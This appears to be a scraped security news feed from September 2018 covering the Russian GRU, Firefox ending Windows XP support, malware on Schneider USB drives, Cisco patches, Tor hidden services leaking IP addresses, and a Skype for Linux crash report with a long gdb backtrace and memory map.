An overview of the GRU:


Formally named the Main Directorate of the General Staff of the Armed Forces, the agency is almost universally referred to by its former acronym GRU.

It is the most shadowy of Russia's secret services. When its previous director Igor Sergun died in 2016, the Kremlin announcement was so terse that it gave neither the date, cause or place of death.

The agency has an apparently broad mandate. According to the Defense Ministry website, it is tasked not only with "ensuring conditions conducive to the successful implementation of the Russian Federation's defense and security policy" but with providing officials intelligence " that they need to make decisions in the political, economic, defense, scientific, technical and environmental areas."


Britain claims that two GRU agents carried out this spring's attack with the nerve agent Novichok on Sergei Skripal, a former GRU officer who became a British double agent, and his daughter. Both survived the poisoning in the city of Salisbury, but three months later two area residents were sickened by the same nerve agent, one of them fatally — it is believed they found the discarded bottle that had carried the Skripals' poison.

This week's claim came less than two months after the U.S. indicted 12 alleged GRU agents for hacking into the Hillary Clinton presidential campaign and the Democratic Party and releasing tens of thousands of private communications, part of a sweeping conspiracy by the Kremlin to meddle in the 2016 U.S. election.

Also this year, the investigative group Bellingcat reported that a GRU officer was in charge of operations in eastern Ukraine, where Russia-backed separatists were fighting Ukrainian forces, in July 2014 when a Malaysian passenger airliner was shot down, killing all 298 people aboard. International investigators say the plane was shot down by a mobile missile launcher brought in from Russia. The GRU officer named by Bellingcat reportedly was responsible for weapons transfers.

Russia's RBC news service reported this year that the GRU oversees Russian mercenaries in Syria, fighting there as a so-called shadow army.

Russian authorities generally deny allegations against the GRU and refuse to discuss its activities. They said they didn't recognize the suspects Britain named Wednesday in the Salisbury poisoning.


The GRU is one arm of Russia's extensive security and intelligence apparatus, which also includes the Foreign Intelligence Service, known as the SVR, and the Federal Security Service, or FSB, which conducts domestic intelligence and counterintelligence. The SVR and FSB were spun off from the KGB after the collapse of the Soviet Union. A former KGB agent, Vladimir Putin ran the FSB before ascending to the presidency.

And as president, Putin names the top brass in the GRU. Of all the agencies, the FSB looms largest in Russians' minds because it hunts domestic threats. The GRU, created under Soviet founder Vladimir Lenin, has a more ruthless reputation, but focuses its energies on foreign threats.

The agencies' operations appear to both compete and cooperate.

Pavel Felgenhauer, an independent Moscow-based military analyst, told The Associated Press that if "the SVR runs into military intelligence, they have to share it with the GRU; that means they try not to run into military intelligence and tell their agents not to report anything military even if they know it. The other way around, military or GRU assets are asked never to report anything political."

But in the case of the alleged U.S. election-related hacking, he said, "I believe that was an inter-service operation, because it's not military but they gained some kind of hacking access and then they shared it with the FSB and the SVR."

Firefox Drops Support for Windows XP
6.9.2018 securityweek Safety

Effective this week, Windows XP is no longer supported by Firefox. More than four years after Microsoft stopped supporting the platform, Mozilla is making a similar move.

Last year, the organization said support for Windows XP was expected to be dropped by June 2018, but the browser developer took a few more months to make that happen.

On Wednesday, Mozilla announced the release of Firefox 62 and also revealed that it updated Firefox ESR (Extended Support Release) to version 60.2. With these releases, Mozilla cut support for Firefox ESR 52, which was the last version of Firefox with Windows XP support.

“At the end of February 2016, XP users made up 12% of release Firefox. By the end of February 2017, XP users made up 8% of release Firefox. If this trend continued without much change after we switched XP users to ESR, XP Firefox users would presently amount to about 2% of release users,” Mozilla says.

While Firefox ESR 52 continues to be available for download, it no longer receives security patches, meaning that any vulnerability found in the browser will remain unpatched.

With Chrome no longer supporting the platform since version 49 and Internet Explorer 8, the browser most used as standard on the platform, getting no security updates for more than two years, Windows XP users are left with no major browser than could keep them safe from exploits while navigating the Internet.

Although still widely used in organizations, Windows XP is currently a nearly-17-year-old operating system that hasn’t received security patches for over four years (although Microsoft did release emergency fixes last year, to address Shadow Brokers-related bugs exploited in the global WannaCry outbreak).

“It required effort, and it required devoting resources to supporting XP well after Microsoft stopped doing so. It meant we couldn’t do other things, since we were busy with XP,” Mozilla says.

Users impacted by the recent change in Firefox are advised to upgrade to a newer operating system to continue receiving patches not only for Mozilla’s applications, but also for other software their computers depend on.

In addition to dropping support for XP, Firefox now includes a preference that allows users to distrust certificates issued by Symantec (by setting "security.pki.distrust_ca_policy" to 2 in about:config). This is yet another step towards removing all trust for Symantec-issued certificates in Firefox 63.

Firefox 62, Mozilla notes in an advisory, also addresses several vulnerabilities: 1 Critical severity, 3 High risk, 2 Medium severity, and 3 Low risk. Affecting Firefox 61 and Firefox ESR 60.1, the most important of these could potentially be exploited to run arbitrary code.

Malware Found on USB Drives Shipped With Schneider Solar Products
6.9.2018 securityweek ICS

Schneider Electric recently informed customers that some of the USB flash drives shipped by the company with its Conext ComBox and Conext Battery Monitor products were infected with malware.

Conext ComBox and Conext Battery Monitor are both part of Schneider’s solar energy offering. ComBox is a communications and monitoring device for installers and operators of Conext solar systems, while Battery Monitor is designed to indicate hours of battery-based runtime and determine the charging state for a battery bank.

According to Schneider, some USB removable media devices shipped with these products were exposed to malware during manufacturing at a third-party supplier’s facility.USB drives shipped by Schneider Electric for Conext products infected with malware

While the France-based industrial giant says the malware should be blocked by all major cybersecurity products, it has advised customers not to use and “securely discard” the compromised devices.

“These USB removable media contain user documentation and non-essential software utilities. They do not contain any operational software and are not required for the installation, commissioning, or operation of the products mentioned above. This issue has no impact on the operation or security of the Conext Combox or Conext Battery Monitor products,” Schneider said in an advisory published last month.

Users who believe they may have accessed one of the potentially impacted flash drives have been advised to perform a full scan of their system. The problematic drives have been shipped with all versions of Conext ComBox (sku 865-1058) and all versions of Conext Battery Monitor (sku 865-1080-01).

SecurityWeek has reached out to Schneider to obtain more information regarding the incident, including how many customers were affected and the type of malware found on the devices, but the company has yet to respond.

USB drives shipped by Schneider Electric for Conext products infected with malware

Incidents involving major companies delivering USB drives infected with malware along the supply chain are not unheard of. Last year, IBM informed customers that it had been shipping malware-infected initialization USBs for its Storwize storage systems, which are used by Lenovo.

The pieces of malware involved in these incidents may not have been advanced, but infected USB drives can pose a serious threat to organizations – particularly in industrial environments where air-gapping is often still used to protect critical systems – and sophisticated threat actors have been known to develop complex USB malware.

Cisco fixes 32 security vulnerabilities in its products, including three critical flaws
6.9.2018 securityaffairs

Cisco has released thirty security patch advisory to address a total of 32 security vulnerabilities in its products, including three critical flaws.
Cisco released thirty security patch advisory to address a total of 32 security vulnerabilities in its products.

The good news is that the tech giant is not aware of any exploitation of the addressed vulnerabilities in attacks in the wild.

Three flaws are rated as critical, one of them is the recently discovered CVE-2018-11776 Apache Struts remote code execution vulnerability.

The other critical issues addressed by Cisco are the Cisco Umbrella API Unauthorized Access Vulnerability (CVE-2018-0435) and the Cisco RV110W, RV130W, and RV215W Routers Management Interface Buffer Overflow Vulnerability (CVE-2018-0423).

The “critical” flaw CVE-2018-0435 affects Cisco Umbrella API, a remote authenticated attacker could leverage the vulnerability to read or modify data across multiple organizations.

“A vulnerability in the Cisco Umbrella API could allow an authenticated, remote attacker to view and modify data across their organization and other organizations.” reads the security advisory.

“The vulnerability is due to insufficient authentication configurations for the API interface of Cisco Umbrella. An attacker could exploit this vulnerability to view and potentially modify data for their organization or other organizations. A successful exploit could allow the attacker to read or modify data across multiple organizations.”

The vulnerability has been addressed in the API, this means that no action is requested for the end-users.

The Umbrella solution is also affected by other high severity vulnerabilities, two flaws affect the Umbrella Enterprise Roaming client and attackers can exploit them by an authenticated attacker to elevate privileges to “Administrator.”

The second flaw addressed by Cisco is the CVE-2018-0423, a buffer overflow vulnerability that resides in the web-based management interface of several firewalls and routers belonging to the RV series. The flaw could be exploited by a remote and unauthenticated attacker to trigger a denial-of-service (DoS) condition or to execute arbitrary code.

“A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router could allow an unauthenticated, remote attacker to cause a denial of service condition or to execute arbitrary code.” reads the security advisory.

“The vulnerability is due to improper boundary restrictions on user-supplied input in the Guest user feature of the web-based management interface. An attacker could exploit this vulnerability by sending malicious requests to a targeted device, triggering a buffer overflow condition. A successful exploit could allow the attacker to cause the device to stop responding, resulting in a denial of service condition, or could allow the attacker to execute arbitrary code.”

The flaw could be exploited by an attacker by sending malicious requests to a targeted device, triggering a buffer overflow condition.

Cisco issued security updates for serious privilege escalation and information disclosure flaws in WebEx, a DoS flaw in Prime Access Registrar, two command injections in the Integrated Management Controller (IMC) software, and a privilege escalation in Data Center Network Manager.

Many misconfigured Tor sites expose the public IP address via SSL certificates
6.9.2018 securityaffairs Safety

Security researcher discovered that many misconfigured Tor sites using SSL certificated could expose the public IP addresses of underlying servers.
Yonathan Klijnsma, a threat researcher at RiskIQ, has discovered that many misconfigured Tor sites using SSL certificated could expose the public IP addresses of underlying servers.

Properly configured servers hosting hidden services have to listen only on the localhost ( instead of any other public IP address.

“The way these guys are messing up is that they have their local Apache or Nginx server listening on any (* or IP address, which means Tor connections will work obviously, but also external connections will as well,”

Klijnsma explained to BleepingComputer. “This is especially true if they don’t use a firewall. These servers should be configured to only listen on”

The expert highlighted that it is quite easy to find misconfigured servers that expose their public IP address.

Every time an administrator of a hidden service adds an SSL certificate to a site, it associates the .onion domain with the certificate. The Common Name (CN) field of the certificate reports the .onion address of the hidden service.

Tor sites IP address

When administrators misconfigure a server so that it listens on a public IP address, the SSL certificate associated with the website will be used for the public IP address.

Klijnsma discovered the misconfigured servers by crawling the Internet and associating SSL certificates to they’re hosted IP addressed. In this way, the expert discovered the misconfigured hidden Tor services and the corresponding public IP addressed.

Yonathan Klijnsma

Another #Tor hidden service exposed through an incorrect configuration of the listening server. Hiding your private forum on the deep dark (and still very public) web. Certificate can be found here (host is still live!): …

7:31 PM - Aug 4, 2018
159 people are talking about this
Twitter Ads info and privacy
The expert concluded that to avoid the exposure of the public IP address for a Tor hidden service it should only listen on

An untold story of a memory corruption bug in Skype
6.9.2018 securityaffairs Cyber

Security expert discovered that Skype has a malloc(): memory corruption vulnerability that could be triggered while users share some media/file with someone during a call.
Tested on: Linux zero 4.15.0-29-generic #31-Ubuntu SMP Tue Jul 17 15:39:52 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux (Ubuntu 18.04 LTS)
Product affected: Skype for linux (skypeforlinux_8.27.0.85_amd64.deb)Steps to reproduce this issue:
1. Open Skype
2. Call anyone
3. During the call try sharing the media or files to the same person
4. The Skype gets crash.
While on a call with one of my colleague, I tried sharing a file which froze my Skype and then it gets crash. However, moving further I tried to debug it with `gdb` and this is what Igot.

$ *** Error in `/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896': malloc(): memory corruption: 0x000000000641ff80 ***
======= Backtrace: =========
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896(malloc+0x1c)[0x47cc34c]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x4e3b90b]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896(_ZN11file_dialog14ShowOpenDialogERKNS_14DialogSettingsERKN4base8CallbackIFvbRKSt6vectorINS3_8FilePathESaIS6_EEELNS3_8internal8CopyModeE1ELNSC_10RepeatModeE1EEE+0x2d)[0x4e3be3d]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896(_ZN4atom15WebDialogHelper14RunFileChooserEPN7content15RenderFrameHostERKNS1_17FileChooserParamsE+0x33c)[0x4e4d90c]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x1d8c9b4]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x1d8c858]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x1d86c2f]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x2347525]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x48001eb]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x47ed9db]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x47edcf8]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x47ee0d1]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x47c4159]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x47affc0]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x1bfef9e]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x1bfed9e]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x1d65ead]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x1e67b93]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x1a4c63c]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x19e6d0d]
======= Memory map: ========
000dc000-00200000 rw-p 00000000 07:15 15088 /snap/skype/51/usr/share/skypeforlinux/skypeforlinux
00200000-01802000 r--p 00124000 07:15 15088 /snap/skype/51/usr/share/skypeforlinux/skypeforlinux
01802000-04f35000 r-xp 01726000 07:15 15088 /snap/skype/51/usr/share/skypeforlinux/skypeforlinux
04f35000-04f4b000 rw-p 04e59000 07:15 15088 /snap/skype/51/usr/share/skypeforlinux/skypeforlinux
04f4b000-05818000 rw-p 00000000 00:00 0
06322000-0749a000 rw-p 00000000 00:00 0 [heap]
af8f00000-af8f80000 rw-p 00000000 00:00 0
2a231d00000-2a231d80000 rw-p 00000000 00:00 0
4342f600000-4342f6ab000 rw-p 00000000 00:00 0
4dab7f00000-4dab800a000 rw-p 00000000 00:00 0
5e2b1980000-5e2b1a00000 rw-p 00000000 00:00 0
683f0500000-683f0580000 rw-p 00000000 00:00 0
74c45800000-74c45880000 rw-p 00000000 00:00 0
7f95e280000-7f95e300000 rw-p 00000000 00:00 0
8590f380000-8590f400000 rw-p 00000000 00:00 0
a95ac180000-a95ac200000 rw-p 00000000 00:00 0
b464c9b8000-b464c9c0000 rw-p 00000000 00:00 0
b464c9c0000-b464c9c4000 ---p 00000000 00:00 0
bf52cd00000-bf52cd80000 rw-p 00000000 00:00 0
c191e080000-c191e100000 rw-p 00000000 00:00 0
fe78f400000-fe78f480000 rw-p 00000000 00:00 0
14c588080000-14c588100000 rw-p 00000000 00:00 0
16dfa8300000-16dfa8380000 rw-p 00000000 00:00 0
1b328cb00000-1b328cb80000 rw-p 00000000 00:00 0
1de101180000-1de101200000 rw-p 00000000 00:00 0
1e993f000000-1e993f080000 rw-p 00000000 00:00 0
20c071f00000-20c071f80000 rw-p 00000000 00:00 0
20c61d680000-20c61d700000 rw-p 00000000 00:00 0
2240c1900000-2240c19ab000 rw-p 00000000 00:00 0
22628d700000-22628d780000 rw-p 00000000 00:00 0
25bf77500000-25bf77580000 rw-p 00000000 00:00 0
26ce1a280000-26ce1a300000 rw-p 00000000 00:00 0
26daf9ead000-26daf9f00000 ---p 00000000 00:00 0
26daf9f00000-26daf9f03000 rw-p 00000000 00:00 0
26daf9f03000-26daf9f04000 ---p 00000000 00:00 0
26daf9f04000-26daf9f2d000 rwxp 00000000 00:00 0
26daf9f2d000-26daf9f80000 ---p 00000000 00:00 0
26daf9f80000-26daf9f83000 rw-p 00000000 00:00 0
26daf9f83000-26daf9f84000 ---p 00000000 00:00 0
26daf9f84000-26daf9fad000 rwxp 00000000 00:00 0
26daf9fad000-26dafa000000 ---p 00000000 00:00 0
26dafa000000-26dafa003000 rw-p 00000000 00:00 0
26dafa003000-26dafa004000 ---p 00000000 00:00 0
26dafa004000-26dafa02d000 rwxp 00000000 00:00 0
26dafa02d000-26dafa080000 ---p 00000000 00:00 0
26dafa080000-26dafa083000 rw-p 00000000 00:00 0
26dafa083000-26dafa084000 ---p 00000000 00:00 0
26dafa084000-26dafa0ff000 rwxp 00000000 00:00 0
26dafa0ff000-26dafa100000 ---p 00000000 00:00 0
26dafa100000-26dafa103000 rw-p 00000000 00:00 0
26dafa103000-26dafa104000 ---p 00000000 00:00 0
26dafa104000-26dafa17f000 rwxp 00000000 00:00 0
26dafa17f000-26dafa180000 ---p 00000000 00:00 0
26dafa180000-26dafa183000 rw-p 00000000 00:00 0
26dafa183000-26dafa184000 ---p 00000000 00:00 0
26dafa184000-26dafa1ff000 rwxp 00000000 00:00 0
26dafa1ff000-26dafa200000 ---p 00000000 00:00 0
26dafa200000-26dafa203000 rw-p 00000000 00:00 0
26dafa203000-26dafa204000 ---p 00000000 00:00 0
26dafa204000-26dafa27f000 rwxp 00000000 00:00 0
26dafa27f000-26db19ead000 ---p 00000000 00:00 0
2adf28e80000-2adf28f00000 rw-p 00000000 00:00 0
2b4467900000-2b4467980000 rw-p 00000000 00:00 0
2bb8adb80000-2bb8adc00000 rw-p 00000000 00:00 0
2dadb8480000-2dadb8500000 rw-p 00000000 00:00 0
2fa869080000-2fa869100000 rw-p 00000000 00:00 0
325d21200000-325d21280000 rw-p 00000000 00:00 0
3462c4b00000-3462c4b80000 rw-p 00000000 00:00 0
34a98af80000-34a98b000000 rw-p 00000000 00:00 0
34efe4300000-34efe4380000 rw-p 00000000 00:00 0
355999380000-355999400000 rw-p 00000000 00:00 0
35c8d9680000-35c8d9685000 rw-p 00000000 00:00 0
36fd03c00000-36fd03c80000 rw-p 00000000 00:00 0
371ab4200000-371ab4280000 rw-p 00000000 00:00 0
37e430000000-37e430080000 rw-p 00000000 00:00 0
37f3b2f00000-37f3b2f80000 rw-p 00000000 00:00 0
389966a80000-389966b8a000 rw-p 00000000 00:00 0
3ad500400000-3ad500480000 rw-p 00000000 00:00 0
3aff91d80000-3aff91de2000 rw-p 00000000 00:00 0
3b2f0d680000-3b2f0d700000 rw-p 00000000 00:00 0
3fba22080000-3fba22100000 rw-p 00000000 00:00 0
7fb4bfffc000-7fb4c3ffd000 rw-s 00000000 00:1a 116 /dev/shm/pulse-shm-3506809168
7fb4c3ffd000-7fb4c7ffe000 rw-s 00000000 00:1a 115 /dev/shm/pulse-shm-136900218
7fb4c7ffe000-7fb4cbfff000 rw-s 00000000 00:1a 95 /dev/shm/pulse-shm-1835135660
7fb4cbfff000-7fb4d0000000 rw-s 00000000 00:1a 93 /dev/shm/pulse-shm-465478744
7fb4d0000000-7fb4d0029000 rw-p 00000000 00:00 0
7fb4d0029000-7fb4d4000000 ---p 00000000 00:00 0
7fb4d615e000-7fb4d615f000 ---p 00000000 00:00 0
7fb4d615f000-7fb4d695f000 rw-p 00000000 00:00 0
7fb4d695f000-7fb4d6960000 ---p 00000000 00:00 0
7fb4d6960000-7fb4d7160000 rw-p 00000000 00:00 0
7fb4d7160000-7fb4d7180000 rw-s 00000000 00:1a 195 /dev/shm/.org.chromium.Chromium.5U4VoF (deleted)
7fb4d7180000-7fb4d71c0000 rw-s 00000000 00:1a 194 /dev/shm/.org.chromium.Chromium.RLeLh9 (deleted)
7fb4d71c0000-7fb4d71e0000 rw-s 00000000 00:1a 185 /dev/shm/.org.chromium.Chromium.vuEDaD (deleted)
7fb4d71e0000-7fb4d7220000 rw-s 00000000 00:1a 124 /dev/shm/.org.chromium.Chromium.QXky36 (deleted)
7fb4d7260000-7fb4d72a0000 rw-s 00000000 00:1a 190 /dev/shm/.org.chromium.Chromium.iNwIs3 (deleted)
7fb4d72a0000-7fb4d72e0000 rw-s 00000000 00:1a 189 /dev/shm/.org.chromium.Chromium.TCc7Dx (deleted)
7fb4d7320000-7fb4d7340000 rw-s 00000000 00:1a 153 /dev/shm/.org.chromium.Chromium.niC6By (deleted)
7fb4d7340000-7fb4d7380000 rw-s 00000000 00:1a 184 /dev/shm/.org.chromium.Chromium.Bckk6z (deleted)
7fb4d7380000-7fb4d73c0000 rw-s 00000000 00:1a 183 /dev/shm/.org.chromium.Chromium.cjU5H8 (deleted)
7fb4d73c0000-7fb4d7400000 rw-s 00000000 00:1a 182 /dev/shm/.org.chromium.Chromium.T0uSjH (deleted)
7fb4d7400000-7fb4d7440000 rw-s 00000000 00:1a 181 /dev/shm/.org.chromium.Chromium.QW3FVf (deleted)
7fb4d7440000-7fb4d7480000 rw-s 00000000 00:1a 180 /dev/shm/.org.chromium.Chromium.VUxuxO (deleted)
7fb4d74c0000-7fb4d7500000 rw-s 00000000 00:1a 178 /dev/shm/.org.chromium.Chromium.HikaLV (deleted)
7fb4d7640000-7fb4d7680000 rw-s 00000000 00:1a 171 /dev/shm/.org.chromium.Chromium.4UVv2P (deleted)
7fb4d7680000-7fb4d76c0000 rw-s 00000000 00:1a 170 /dev/shm/.org.chromium.Chromium.BpeuEo (deleted)
7fb4d7700000-7fb4d7740000 rw-s 00000000 00:1a 168 /dev/shm/.org.chromium.Chromium.vB2tSv (deleted)
7fb4d7780000-7fb4d77c0000 rw-s 00000000 00:1a 166 /dev/shm/.org.chromium.Chromium.8lIy6C (deleted)
7fb4d7840000-7fb4d7880000 rw-s 00000000 00:1a 162 /dev/shm/.org.chromium.Chromium.aN74AR (deleted)
7fb4d7880000-7fb4d78c0000 rw-s 00000000 00:1a 161 /dev/shm/.org.chromium.Chromium.ExRifq (deleted)
7fb4d78c0000-7fb4d7900000 rw-s 00000000 00:1a 160 /dev/shm/.org.chromium.Chromium.O1MxTY (deleted)
7fb4d7940000-7fb4d7980000 rw-s 00000000 00:1a 158 /dev/shm/.org.chromium.Chromium.mxd5b6 (deleted)
7fb4d79c0000-7fb4d7a00000 rw-s 00000000 00:1a 156 /dev/shm/.org.chromium.Chromium.byaHud (deleted)
7fb4d7a40000-7fb4d7a80000 rw-s 00000000 00:1a 132 /dev/shm/.org.chromium.Chromium.2FEnNk (deleted)
7fb4d7ac0000-7fb4d7b00000 rw-s 00000000 00:1a 130 /dev/shm/.org.chromium.Chromium.HFba6r (deleted)
7fb4d7b00000-7fb4d7b40000 rw-s 00000000 00:1a 129 /dev/shm/.org.chromium.Chromium.tFrAK0 (deleted)
7fb4d7b40000-7fb4d7b80000 rw-s 00000000 00:1a 152 /dev/shm/.org.chromium.Chromium.4rXuc5 (deleted)
7fb4d7b80000-7fb4d7bc0000 rw-s 00000000 00:1a 151 /dev/shm/.org.chromium.Chromium.ei9cxE (deleted)
7fb4d7f40000-7fb4d7f80000 rw-s 00000000 00:1a 146 /dev/shm/.org.chromium.Chromium.hbGEFc (deleted)
7fb4d7fc0000-7fb4d8000000 rw-s 00000000 00:1a 144 /dev/shm/.org.chromium.Chromium.TaWipl (deleted)
7fb4d8000000-7fb4d803c000 rw-p 00000000 00:00 0
7fb4d803c000-7fb4dc000000 ---p 00000000 00:00 0
7fb4dc000000-7fb4dc021000 rw-p 00000000 00:00 0
7fb4dc021000-7fb4e0000000 ---p 00000000 00:00 0
7fb4e0000000-7fb4e0022000 rw-p 00000000 00:00 0
7fb4e0022000-7fb4e4000000 ---p 00000000 00:00 0
7fb4e4030000-7fb4e4094000 rw-s 00000000 00:1a 111 /dev/shm/.org.chromium.Chromium.7I5ZtW (deleted)
7fb4e4094000-7fb4e40f4000 rw-s 00000000 00:1a 100 /dev/shm/.org.chromium.Chromium.L6QAhS (deleted)
7fb4e40f4000-7fb4e4154000 rw-s 00000000 00:1a 91 /dev/shm/.org.chromium.Chromium.Sf8WzY (deleted)
7fb4e4154000-7fb4e4155000 ---p 00000000 00:00 0
7fb4e4155000-7fb4e4955000 rw-p 00000000 00:00 0
7fb4e4995000-7fb4e49d5000 rw-s 00000000 00:1a 137 /dev/shm/.org.chromium.Chromium.Hx0IZk (deleted)
7fb4e49d5000-7fb4e637d000 r-xp 00000000 08:01 26878205 /usr/lib/x86_64-linux-gnu/
7fb4e637d000-7fb4e657c000 ---p 019a8000 08:01 26878205 /usr/lib/x86_64-linux-gnu/
7fb4e657c000-7fb4e657d000 r--p 019a7000 08:01 26878205 /usr/lib/x86_64-linux-gnu/
7fb4e657d000-7fb4e657e000 rw-p 019a8000 08:01 26878205 /usr/lib/x86_64-linux-gnu/
7fb4e657e000-7fb4e6721000 r-xp 00000000 08:01 26878215 /usr/lib/x86_64-linux-gnu/
7fb4e6721000-7fb4e6920000 ---p 001a3000 08:01 26878215 /usr/lib/x86_64-linux-gnu/
7fb4e6920000-7fb4e6933000 r--p 001a2000 08:01 26878215 /usr/lib/x86_64-linux-gnu/
7fb4e6933000-7fb4e6934000 rw-p 001b5000 08:01 26878215 /usr/lib/x86_64-linux-gnu/
7fb4e6934000-7fb4e6935000 rw-p 00000000 00:00 0
7fb4e6935000-7fb4e6bc7000 r-xp 00000000 08:01 26878207 /usr/lib/x86_64-linux-gnu/
7fb4e6bc7000-7fb4e6dc6000 ---p 00292000 08:01 26878207 /usr/lib/x86_64-linux-gnu/
7fb4e6dc6000-7fb4e6dd5000 r--p 00291000 08:01 26878207 /usr/lib/x86_64-linux-gnu/
7fb4e6dd5000-7fb4e6dd6000 rw-p 002a0000 08:01 26878207 /usr/lib/x86_64-linux-gnu/
7fb4e6dd6000-7fb4e6e1b000 r-xp 00000000 08:01 27136130 /usr/lib/x86_64-linux-gnu/libunity/
7fb4e6e1b000-7fb4e701a000 ---p 00045000 08:01 27136130 /usr/lib/x86_64-linux-gnu/libunity/
7fb4e701a000-7fb4e701d000 r--p 00044000 08:01 27136130 /usr/lib/x86_64-linux-gnu/libunity/
7fb4e701d000-7fb4e701e000 rw-p 00047000 08:01 27136130 /usr/lib/x86_64-linux-gnu/libunity/
7fb4e701e000-7fb4e7057000 r-xp 00000000 08:01 26877853 /usr/lib/x86_64-linux-gnu/
7fb4e7057000-7fb4e7257000 ---p 00039000 08:01 26877853 /usr/lib/x86_64-linux-gnu/
7fb4e7257000-7fb4e7258000 r--p 00039000 08:01 26877853 /usr/lib/x86_64-linux-gnu/
7fb4e7258000-7fb4e7259000 rw-p 0003a000 08:01 26877853 /usr/lib/x86_64-linux-gnu/
7fb4e7259000-7fb4e72f6000 r-xp 00000000 08:01 26878675 /usr/lib/x86_64-linux-gnu/
7fb4e72f6000-7fb4e74f6000 ---p 0009d000 08:01 26878675 /usr/lib/x86_64-linux-gnu/
7fb4e74f6000-7fb4e74fa000 r--p 0009d000 08:01 26878675 /usr/lib/x86_64-linux-gnu/
7fb4e74fa000-7fb4e74fc000 rw-p 000a1000 08:01 26878675 /usr/lib/x86_64-linux-gnu/
7fb4e74fc000-7fb4e74fd000 rw-p 00000000 00:00 0
7fb4e74fd000-7fb4e74fe000 ---p 00000000 00:00 0
7fb4e74fe000-7fb4e7cfe000 rw-p 00000000 00:00 0
7fb4e7cfe000-7fb4e7dc3000 r-xp 00000000 07:15 15069 /snap/skype/51/usr/share/skypeforlinux/resources/app.asar.unpacked/node_modules/electron-ssid/build/Release/electron-ssid.node
7fb4e7dc3000-7fb4e7fc2000 ---p 000c5000 07:15 15069 /snap/skype/51/usr/share/skypeforlinux/resources/app.asar.unpacked/node_modules/electron-ssid/build/Release/electron-ssid.node
7fb4e7fc2000-7fb4e7fcb000 rw-p 000c4000 07:15 15069 /snap/skype/51/usr/share/skypeforlinux/resources/app.asar.unpacked/node_modules/electron-ssid/build/Release/electron-ssid.node
7fb4e7fcb000-7fb4e7fdf000 rw-p 00000000 00:00 0
7fb4e7fdf000-7fb4e7fff000 rw-p 00101000 07:15 15069 /snap/skype/51/usr/share/skypeforlinux/resources/app.asar.unpacked/node_modules/electron-ssid/build/Release/electron-ssid.node
7fb4e7fff000-7fb4ec000000 rw-s 00000000 00:1a 12 /dev/shm/pulse-shm-2958556533
7fb4ec000000-7fb4ec021000 rw-p 00000000 00:00 0
7fb4ec021000-7fb4f0000000 ---p 00000000 00:00 0
7fb4f002d000-7fb4f0091000 rw-s 00000000 00:1a 90 /dev/shm/.org.chromium.Chromium.JPBrMl (deleted)
7fb4f0091000-7fb4f00d1000 rw-s 00000000 00:1a 134 /dev/shm/.org.chromium.Chromium.ctJK62 (deleted)
7fb4f00f1000-7fb4f0151000 rw-s 00000000 00:1a 89 /dev/shm/.org.chromium.Chromium.kfsXYI (deleted)
7fb4f0151000-7fb4f01d2000 rw-s 00000000 08:01 1838001 /home/input0/snap/skype/common/.config/skypeforlinux/Cache/index
7fb4f01d2000-7fb4f01d3000 ---p 00000000 00:00 0
7fb4f01d3000-7fb4f09d3000 rw-p 00000000 00:00 0
7fb4f09d3000-7fb4f0a1f000 r-xp 00000000 07:15 484 /snap/skype/51/usr/lib/x86_64-linux-gnu/
7fb4f0a1f000-7fb4f0c1e000 ---p 0004c000 07:15 484 /snap/skype/51/usr/lib/x86_64-linux-gnu/
7fb4f0c1e000-7fb4f0c21000 r--p 0004b000 07:15 484 /snap/skype/51/usr/lib/x86_64-linux-gnu/
7fb4f0c21000-7fb4f0c22000 rw-p 0004e000 07:15 484 /snap/skype/51/usr/lib/x86_64-linux-gnu/
7fb4f0c22000-7fb4f0c26000 rw-p 00050000 07:15 484 /snap/skype/51/usr/lib/x86_64-linux-gnu/
7fb4f0c26000-7fb4f0cba000 r-xp 00000000 07:15 15077 /snap/skype/51/usr/share/skypeforlinux/resources/app.asar.unpacked/node_modules/keytar/build/Release/keytar.node
7fb4f0cba000-7fb4f0eb9000 ---p 00094000 07:15 15077 /snap/skype/51/usr/share/skypeforlinux/resources/app.asar.unpacked/node_modules/keytar/build/Release/keytar.node
7fb4f0eb9000-7fb4f0ec0000 rw-p 00093000 07:15 15077 /snap/skype/51/usr/share/skypeforlinux/resources/app.asar.unpacked/node_modules/keytar/build/Release/keytar.node
7fb4f0ec0000-7fb4f0ed3000 rw-p 00000000 00:00 0
